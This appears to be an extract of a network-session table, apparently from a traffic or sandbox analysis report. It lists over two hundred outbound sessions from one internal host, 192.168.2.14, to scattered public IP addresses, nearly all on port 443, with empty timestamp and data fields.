                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16642192.168.2.1452332187.177.41.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16643192.168.2.144833658.86.243.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16644192.168.2.1440408185.61.185.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16645192.168.2.1446816196.15.186.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16646192.168.2.1459386221.119.135.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16647192.168.2.145164058.62.117.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16648192.168.2.1440518101.179.75.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16649192.168.2.143715212.159.48.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16650192.168.2.145700677.223.252.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16651192.168.2.1441566129.169.98.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16652192.168.2.1446726124.13.57.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16653192.168.2.144838042.44.136.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16654192.168.2.1457506130.252.184.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16655192.168.2.1436626160.74.26.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16656192.168.2.1447352108.58.124.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16657192.168.2.1458770218.243.205.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16658192.168.2.1446402107.219.75.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16659192.168.2.1456718121.2.134.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16660192.168.2.1449354152.172.229.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16661192.168.2.1442794122.17.150.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16662192.168.2.1452806112.203.181.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16663192.168.2.143810444.100.247.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16664192.168.2.14483349.109.76.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16665192.168.2.144900420.95.154.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16666192.168.2.1446382152.52.142.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16667192.168.2.145101048.41.149.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16668192.168.2.144408265.17.6.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16669192.168.2.1436942117.171.254.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16670192.168.2.1460484167.3.234.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16671192.168.2.144950859.32.28.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16672192.168.2.144913076.66.235.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16673192.168.2.145432274.103.189.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16674192.168.2.1445244113.146.103.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16675192.168.2.1442466164.63.56.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16676192.168.2.1441690121.253.103.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16677192.168.2.143695245.223.53.1478080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16678192.168.2.1435082117.38.136.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16679192.168.2.144260035.216.185.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16680192.168.2.143489814.22.154.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16681192.168.2.145526651.209.63.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16682192.168.2.1451900141.151.130.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16683192.168.2.144381217.129.234.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16684192.168.2.1456324146.239.58.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16685192.168.2.144166267.79.189.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16686192.168.2.1451512123.46.40.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16687192.168.2.1436504211.203.167.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16688192.168.2.145967490.108.158.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16689192.168.2.1437260179.43.162.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16690192.168.2.143550471.59.159.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16691192.168.2.145352247.145.86.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16692192.168.2.14464144.97.217.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16693192.168.2.1453618120.26.126.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16694192.168.2.1436086113.13.120.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16695192.168.2.1442298208.127.190.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16696192.168.2.1447338101.40.78.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16697192.168.2.1437658124.75.113.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16698192.168.2.146046869.42.48.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16699192.168.2.1453826159.55.169.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16700192.168.2.144903674.51.69.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16701192.168.2.1449576187.193.202.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16702192.168.2.144884262.33.254.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16703192.168.2.145176464.185.216.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16704192.168.2.1433874192.203.65.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16705192.168.2.143535886.131.110.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16706192.168.2.1460262183.241.218.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16707192.168.2.146035895.165.87.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16708192.168.2.1434030110.81.178.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16709192.168.2.144829827.38.198.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16710192.168.2.144890272.45.53.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16711192.168.2.145326263.128.179.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16712192.168.2.144382244.96.77.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16713192.168.2.145851412.50.101.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16714192.168.2.1446134167.144.14.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16715192.168.2.143787218.7.115.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16716192.168.2.144015284.166.184.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16717192.168.2.145035620.228.212.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16718192.168.2.145875493.223.107.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16719192.168.2.14355264.180.80.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16720192.168.2.1435674105.248.37.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16721192.168.2.1435830145.39.23.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16722192.168.2.1443664162.226.204.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16723192.168.2.145426095.167.168.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16724192.168.2.144308644.119.229.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16725192.168.2.1441068133.88.255.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16726192.168.2.1453596188.220.53.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16727192.168.2.144538882.238.53.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16728192.168.2.1433726191.218.187.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16729192.168.2.146008866.231.171.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16730192.168.2.145821498.168.64.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16731192.168.2.1446750189.172.93.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16732192.168.2.145860677.146.201.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16733192.168.2.144819472.233.136.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16734192.168.2.1445336211.48.157.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16735192.168.2.1437550159.79.170.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16736192.168.2.1442944110.95.57.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16737192.168.2.143707465.18.56.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16738192.168.2.1439370136.174.209.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16739192.168.2.1448294149.142.47.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16740192.168.2.1446862198.172.27.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16741192.168.2.1452574174.175.87.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16742192.168.2.1454240172.7.119.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16743192.168.2.1444800152.184.227.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16744192.168.2.1433586166.109.139.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16745192.168.2.1436332132.111.194.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16746192.168.2.1439076104.19.153.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16747192.168.2.1452112176.154.56.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16748192.168.2.1451970125.131.53.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16749192.168.2.1454582220.65.42.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16750192.168.2.1439960150.252.8.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16751192.168.2.146066069.169.151.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16752192.168.2.1438866137.19.116.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16753192.168.2.145901253.32.5.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16754192.168.2.144856049.172.3.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16755192.168.2.1439194217.220.111.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16756192.168.2.145860884.115.96.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16757192.168.2.1454060125.236.169.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16758192.168.2.146002461.85.137.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16759192.168.2.144980224.87.249.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16760192.168.2.145368677.147.108.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16761192.168.2.145802480.199.212.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16762192.168.2.1455616169.122.120.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16763192.168.2.1434564102.67.154.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16764192.168.2.1443046122.147.162.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16765192.168.2.1439434101.217.207.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16766192.168.2.1453734210.204.24.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16767192.168.2.144906817.19.49.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16768192.168.2.1446016108.216.196.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16769192.168.2.1455074152.25.181.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16770192.168.2.145227849.233.63.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16771192.168.2.1449194101.170.175.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16772192.168.2.1454748155.139.118.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16773192.168.2.143470819.162.2.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16774192.168.2.144910871.126.185.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16775192.168.2.1443060210.109.125.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16776192.168.2.144218480.242.238.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16777192.168.2.1452508148.214.7.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16778192.168.2.1446748181.15.214.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16779192.168.2.1440938151.70.71.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16780192.168.2.144430097.168.98.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16781192.168.2.146004466.31.168.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16782192.168.2.1454216123.217.150.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16783192.168.2.144778854.172.53.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16784192.168.2.143866054.206.64.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16785192.168.2.1438800197.17.3.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16786192.168.2.1447324190.15.239.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16787192.168.2.144830062.227.20.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16788192.168.2.144520099.83.215.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16789192.168.2.143996489.206.202.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16790192.168.2.145709234.228.246.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16791192.168.2.145684060.5.52.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16792192.168.2.1443008130.52.100.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16793192.168.2.1457852211.166.72.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16794192.168.2.1448654222.135.68.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16795192.168.2.1439608222.182.46.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16796192.168.2.1453332168.251.207.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16797192.168.2.145789627.217.18.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16798192.168.2.144168025.71.54.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16799192.168.2.14511601.176.93.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16800192.168.2.1438802112.179.209.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16801192.168.2.1453580158.9.40.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16802192.168.2.1438554189.26.251.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16803192.168.2.1439134184.68.11.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16804192.168.2.14572225.101.194.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16805192.168.2.1440338210.65.29.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16806192.168.2.143528645.86.38.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16807192.168.2.144981651.231.179.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16808192.168.2.1451358173.66.246.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16809192.168.2.1438772113.35.212.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16810192.168.2.145513874.151.232.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16811192.168.2.1448128124.70.165.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16812192.168.2.144883832.183.46.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16813192.168.2.1443618186.254.245.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16814192.168.2.1447598136.113.149.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16815192.168.2.1442754175.22.134.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16816192.168.2.1459918201.96.7.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16817192.168.2.1433960216.165.120.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16818192.168.2.1460276120.116.44.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16819192.168.2.145018099.0.112.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16820192.168.2.1445552163.67.8.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16821192.168.2.1442038138.15.194.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16822192.168.2.143451442.44.163.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16823192.168.2.145070036.144.239.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16824192.168.2.1451542178.74.83.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16825192.168.2.1444170208.146.135.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16826192.168.2.144174240.2.125.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16827192.168.2.1435898165.240.35.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16828192.168.2.1456564115.187.201.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16829192.168.2.146022872.202.16.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16830192.168.2.145339696.226.143.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16831192.168.2.1440610147.109.251.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16832192.168.2.1449218178.33.95.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16833192.168.2.1454386178.69.91.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16834192.168.2.1443714168.11.188.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16835192.168.2.14462642.70.243.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16836192.168.2.144523895.16.188.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16837192.168.2.1439590124.38.117.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16838192.168.2.1441668213.4.215.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16839192.168.2.1440054192.76.63.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16840192.168.2.1446386197.74.208.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16841192.168.2.1446216193.37.245.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16842192.168.2.1439276100.160.206.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16843192.168.2.1458060159.243.203.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16844192.168.2.1455046188.201.121.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16845192.168.2.1444114217.225.149.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16846192.168.2.144012290.82.191.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16847192.168.2.143553681.163.51.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16848192.168.2.1441916207.107.235.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16849192.168.2.144685898.127.49.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16850192.168.2.1434688104.61.188.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16851192.168.2.145195478.13.69.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16852192.168.2.1443358113.76.224.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16853192.168.2.1439524116.216.120.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16854192.168.2.1443204219.148.65.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16855192.168.2.144659888.0.132.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16856192.168.2.1437838112.52.190.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16857192.168.2.145808266.129.179.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16858192.168.2.143642282.205.146.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16859192.168.2.143631077.211.13.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16860192.168.2.143724646.221.152.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16861192.168.2.1445158119.2.2.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16862192.168.2.1440074149.69.225.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16863192.168.2.1447338190.106.10.232443
